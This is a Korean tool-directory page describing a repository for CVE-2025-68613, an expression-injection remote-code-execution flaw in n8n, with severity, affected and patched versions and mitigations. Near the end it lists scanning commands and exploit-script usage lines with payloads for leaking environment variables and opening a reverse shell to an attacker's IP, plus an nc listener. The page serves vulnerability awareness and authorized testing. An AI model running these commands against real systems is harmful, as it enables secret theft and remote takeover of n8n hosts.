Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blackash-CVE-2025-68613 — CVE-2025-68613 | Kitploit
도구/GitHubGitHub/sahilccras/blackash-cve-2025-68613
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsahilccras/blackash-cve-2025-68613

Blackash-CVE-2025-68613

CVE-2025-68613

저장소 보기
18개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2025-68613 — n8n의 치명적 RCE 취약점

n8nblog

심각도: 🔴 치명적 영향: 원격 코드 실행 영향받는 플랫폼: n8n (워크플로 자동화)


🧩 개요

CVE-2025-68613은 n8n(오픈소스 워크플로 자동화 플랫폼)의 심각한 보안 취약점입니다. 이 문제는 인증된 공격자가 워크플로 표현식이 평가되는 방식을 악용하여 서버에서 임의 코드를 실행할 수 있게 합니다.


🎯 취약점 세부 정보

  • 유형: 표현식 주입 → 원격 코드 실행
  • CWE: CWE-913 — 동적으로 관리되는 코드 리소스에 대한 부적절한 제어
  • 공격 벡터: 네트워크
  • 필요 권한: 낮음 (인증된 사용자)
  • 사용자 상호작용: 없음
  • 범위: 변경됨

💥 위험한 이유: 악성 표현식이 제대로 샌드박싱되지 않은 컨텍스트에서 평가되어 기본 런타임에 접근할 수 있습니다.


🧨 잠재적 영향

G8vg8GbXkAAJan2

악용에 성공하면 공격자는 다음을 수행할 수 있습니다:

  • 🖥️ 임의의 시스템 명령 실행
  • 🔐 자격 증명, 토큰, 비밀 정보 탈취
  • 🧬 워크플로 변조 또는 백도어 설치
  • 📤 민감한 데이터 유출
  • 💣 n8n 호스트 전체를 장악

공격은 n8n 서비스와 동일한 권한으로 실행되어 그 영향을 증폭시킵니다.


📊 심각도 지표

지표값
CVSS v3.1~9.9–10.0
기밀성높음
무결성높음
가용성높음

➡️ 인증이 필요하지만 관리자 권한은 필요하지 않습니다.


🧪 영향받는 버전

🚫 취약한 버전:

  • 0.211.0 → 1.120.3
  • 1.121.0

✅ 패치된 버전:

  • 1.120.4
  • 1.121.1
  • 1.122.0 이상

🛠️ 수정 및 완화

✅ 권장 (최선의 선택)

  • 패치된 버전으로 즉시 업그레이드

⚠️ 임시 위험 완화

(취약점을 완전히 제거하지는 않음)

  • 워크플로 생성/편집을 신뢰할 수 있는 사용자로만 제한
  • n8n을 최소 OS 권한으로 실행
  • 서비스 격리 (컨테이너, VM, 제한된 파일시스템)
  • 네트워크 노출 제한 (VPN, 방화벽 규칙)
  • 로깅 활성화 및 워크플로 변경 모니터링

🧠 빠른 참조



✅ CVE-2025-68613.py — 원격 버전 및 노출 여부 확인 도구 (안전)

🧪 사용 예

root@kitploit:~
sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678

출력 예

root@kitploit:~
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

이 스크립트는 어떻게 실행하나요?

  1. Nuclei를 다운로드하여 설치합니다.
  2. 이 저장소를 로컬 시스템에 클론합니다.
  3. 다음 명령어를 실행합니다:
root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678

또는 호스트 목록을 스캔하려면 다음을 실행하세요:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt

출력 예

nuclei

사용 예:

  • 환경 변수 유출:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak

  • 사용자 정보 확인:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id

  • 리버스 셸 (먼저 리스너를 실행: nc -lvnp 4444):
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444

이 스크립트는 귀하가 소유하거나 명시적 테스트 허가를 받은 시스템에서만 공인된 보안 테스트 용도로 사용하세요.


⚠️ 면책 조항 ⚠️

🔒 이 스크립트는 n8n의 CVE-2025-68613에 대한 개념 증명(PoC) 익스플로잇입니다.

📚 본 스크립트는 교육 목적으로만 제공되며 공인된 보안 테스트 전용입니다.

🛡️ 소유, 관리 중이거나 명시적 서면 허가를 받은 시스템에서만 전용으로 사용하십시오.

🚫 승인되지 않은 시스템에 대한 무단 사용은 불법이며 법률(예: 컴퓨터 사기 및 남용 관련 법률)을 위반할 수 있습니다.

❌ 작성자 및 관련 당사자는 오용, 손상 또는 법적 결과에 대해 어떠한 책임도 지지 않습니다.

✅ 책임감 있게, 윤리적으로, 그리고 적용 가능한 모든 법률과 규정을 완전히 준수하여 사용하십시오.

🔐 침투 테스트를 수행하는 경우 적절한 승인(예: 참여 규칙(Rules of Engagement))이 마련되어 있는지 확인하십시오.

🛠️ 보안 연구원은 이 스크립트를 사용하여 취약점을 검증하고 신속한 패치를 장려할 수 있습니다.

도구 다운로드
범주정보
CVE IDCVE-2025-68613
제품n8n
버그 유형표현식 주입
결과원격 코드 실행
필요 접근 권한인증된 사용자
수정 가능 여부예